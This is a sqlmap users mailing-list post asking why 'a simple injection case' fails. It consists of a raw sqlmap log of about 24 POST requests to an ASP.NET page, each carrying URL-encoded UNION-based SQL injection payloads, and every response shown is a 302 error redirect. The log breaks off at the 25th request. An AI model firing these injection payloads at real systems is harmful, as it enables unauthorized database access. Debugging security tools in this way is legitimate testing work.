sqlmap-users — sqlmap users mailing list

[sqlmap-users] A simple injection case failing

[Stephen S. <ss...@ss...>]

HTTP request [#1]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 38

ParamterOne=asdf&ParameterTwo=10,11,12,35,61

HTTP response [#1] (200 OK):
Content-length: 122
X-aspnet-version: 4.0.30319
Content-encoding: gzip
Vary: Uri: http://testhost.com:80/TestFile.aspx
Server: Microsoft-IIS/7.5
Date: Tue, 04 Jun 2013 08:18:48 GMT
X-powered-by: ASP.NET
Content-type: text/html; charset=utf-8

[]

############################################################################

HTTP request [#2]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 74

ParamterOne=asdf%5D%22%29%2C%22.%27%5B%22%27&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#2] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:18:51 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#3]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 400

ParamterOne=asdf%29%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2885%29%2BCHAR%2888%29%2BCHAR%2868%29%2BCHAR%28106%29%2BCHAR%2868%29%2BCHAR%2870%29%2BCHAR%2872%29%2BCHAR%28120%29%2BCHAR%2878%29%2BCHAR%28122%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#3] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:06 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#4]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 404

ParamterOne=asdf%29%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28122%29%2BCHAR%28120%29%2BCHAR%28119%29%2BCHAR%28111%29%2BCHAR%2867%29%2BCHAR%28121%29%2BCHAR%28103%29%2BCHAR%28100%29%2BCHAR%2889%29%2BCHAR%2888%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#4] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:11 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#5]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 403

ParamterOne=asdf%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28113%29%2BCHAR%2886%29%2BCHAR%28107%29%2BCHAR%28122%29%2BCHAR%28102%29%2BCHAR%2878%29%2BCHAR%2880%29%2BCHAR%28101%29%2BCHAR%2899%29%2BCHAR%28110%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#5] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:12 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#6]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 402

ParamterOne=-9721%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28119%29%2BCHAR%28103%29%2BCHAR%2898%29%2BCHAR%28113%29%2BCHAR%2871%29%2BCHAR%2869%29%2BCHAR%28121%29%2BCHAR%2888%29%2BCHAR%2865%29%2BCHAR%2874%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#6] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:23 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#7]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 403

ParamterOne=-8407%29%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2881%29%2BCHAR%2865%29%2BCHAR%28122%29%2BCHAR%28106%29%2BCHAR%2867%29%2BCHAR%28121%29%2BCHAR%28116%29%2BCHAR%28122%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#7] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:24 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#8]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 404

ParamterOne=-5107%29%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2886%29%2BCHAR%28121%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2876%29%2BCHAR%28120%29%2BCHAR%28115%29%2BCHAR%2887%29%2BCHAR%28112%29%2BCHAR%28121%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#8] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:25 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#9]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 401

ParamterOne=asdf%29%20UNION%20ALL%20SELECT%2016%2C16%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28101%29%2BCHAR%28104%29%2BCHAR%28103%29%2BCHAR%28122%29%2BCHAR%2866%29%2BCHAR%28116%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%28115%29%2BCHAR%2887%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#9] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:46 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#10]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 399

ParamterOne=asdf%29%20UNION%20ALL%20SELECT%2016%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2883%29%2BCHAR%2889%29%2BCHAR%28119%29%2BCHAR%28114%29%2BCHAR%28108%29%2BCHAR%28110%29%2BCHAR%2871%29%2BCHAR%2869%29%2BCHAR%28108%29%2BCHAR%28106%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2C16--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#10] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:47 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#11]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 399

ParamterOne=asdf%29%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2878%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%28103%29%2BCHAR%28119%29%2BCHAR%2899%29%2BCHAR%28117%29%2BCHAR%28109%29%2BCHAR%2870%29%2BCHAR%28106%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2C16%2C16--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#11] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:48 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#12]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 398

ParamterOne=-8210%29%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2897%29%2BCHAR%2897%29%2BCHAR%2898%29%2BCHAR%28122%29%2BCHAR%28122%29%2BCHAR%2885%29%2BCHAR%28107%29%2BCHAR%28102%29%2BCHAR%2867%29%2BCHAR%2871%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2C16%2C16--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#12] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:53 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#13]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 398

ParamterOne=-7118%29%20UNION%20ALL%20SELECT%2016%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2888%29%2BCHAR%2869%29%2BCHAR%2899%29%2BCHAR%28111%29%2BCHAR%2875%29%2BCHAR%28119%29%2BCHAR%28102%29%2BCHAR%2890%29%2BCHAR%2865%29%2BCHAR%28102%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2C16--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#13] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:54 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#14]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 398

ParamterOne=-6028%29%20UNION%20ALL%20SELECT%2016%2C16%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2881%29%2BCHAR%2883%29%2BCHAR%28105%29%2BCHAR%28114%29%2BCHAR%28108%29%2BCHAR%2880%29%2BCHAR%2879%29%2BCHAR%28121%29%2BCHAR%2887%29%2BCHAR%2872%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#14] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:19:56 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#15]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 396

ParamterOne=asdf%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2881%29%2BCHAR%2878%29%2BCHAR%2890%29%2BCHAR%2873%29%2BCHAR%2885%29%2BCHAR%28120%29%2BCHAR%28107%29%2BCHAR%2869%29%2BCHAR%2888%29%2BCHAR%2877%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#15] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:00 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#16]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 398

ParamterOne=asdf%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28100%29%2BCHAR%28102%29%2BCHAR%2882%29%2BCHAR%2884%29%2BCHAR%2887%29%2BCHAR%2874%29%2BCHAR%28110%29%2BCHAR%28118%29%2BCHAR%2877%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#16] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:01 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#17]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 398

ParamterOne=asdf%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2865%29%2BCHAR%28121%29%2BCHAR%28108%29%2BCHAR%2865%29%2BCHAR%2897%29%2BCHAR%2888%29%2BCHAR%28122%29%2BCHAR%28107%29%2BCHAR%2883%29%2BCHAR%2871%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#17] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:02 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#18]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 400

ParamterOne=-3448%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2898%29%2BCHAR%28115%29%2BCHAR%2876%29%2BCHAR%2870%29%2BCHAR%28108%29%2BCHAR%28116%29%2BCHAR%28108%29%2BCHAR%28115%29%2BCHAR%2872%29%2BCHAR%2898%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#18] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:05 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#19]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 399

ParamterOne=-4885%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2881%29%2BCHAR%2885%29%2BCHAR%28103%29%2BCHAR%28106%29%2BCHAR%2873%29%2BCHAR%2865%29%2BCHAR%2866%29%2BCHAR%2888%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#19] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:08 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#20]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 398

ParamterOne=-2357%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2873%29%2BCHAR%28111%29%2BCHAR%2877%29%2BCHAR%2888%29%2BCHAR%2872%29%2BCHAR%2876%29%2BCHAR%2877%29%2BCHAR%28106%29%2BCHAR%28120%29%2BCHAR%2878%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#20] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:09 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#21]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 404

ParamterOne=asdf%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%2897%29%2BCHAR%2899%29%2BCHAR%2878%29%2BCHAR%28114%29%2BCHAR%28113%29%2BCHAR%28103%29%2BCHAR%2889%29%2BCHAR%2868%29%2BCHAR%28114%29%2BCHAR%2871%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#21] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:12 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#22]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 405

ParamterOne=asdf%27%29%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28110%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%2883%29%2BCHAR%28116%29%2BCHAR%2897%29%2BCHAR%2899%29%2BCHAR%2887%29%2BCHAR%28110%29%2BCHAR%2884%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#22] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:13 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#23]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 403

ParamterOne=asdf%27%29%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%28115%29%2BCHAR%2883%29%2BCHAR%2881%29%2BCHAR%2897%29%2BCHAR%2872%29%2BCHAR%28101%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#23] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:17 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#24]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 406

ParamterOne=-3686%27%29%20UNION%20ALL%20SELECT%20NULL%2CCHAR%2858%29%2BCHAR%28106%29%2BCHAR%28117%29%2BCHAR%28103%29%2BCHAR%2858%29%2BCHAR%28103%29%2BCHAR%2883%29%2BCHAR%28109%29%2BCHAR%2888%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR%28111%29%2BCHAR%2867%29%2BCHAR%2873%29%2BCHAR%28115%29%2BCHAR%2858%29%2BCHAR%28104%29%2BCHAR%28111%29%2BCHAR%28114%29%2BCHAR%2858%29%2CNULL--%20&ParameterTwo=10%2C11%2C12%2C35%2C61

HTTP redirect [#24] (302 Found):
Content-length: 187
X-aspnet-version: 4.0.30319
X-powered-by: ASP.NET
Server: Microsoft-IIS/7.5
Location: /error.html?aspxerrorpath=TestFile.aspx
Date: Tue, 04 Jun 2013 08:20:21 GMT
Content-type: text/html; charset=utf-8

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="/error.html?aspxerrorpath=TestFile.aspx">here</a>.</h2>
</body></html>


############################################################################

HTTP request [#25]:
POST TestFile.aspx HTTP/1.1
User-agent: sqlmap/1.0-dev-3e0f747 (http://sqlmap.org)
Host: testhost.com
Content-type: application/x-www-form-urlencoded; charset=utf-8
Content-length: 406

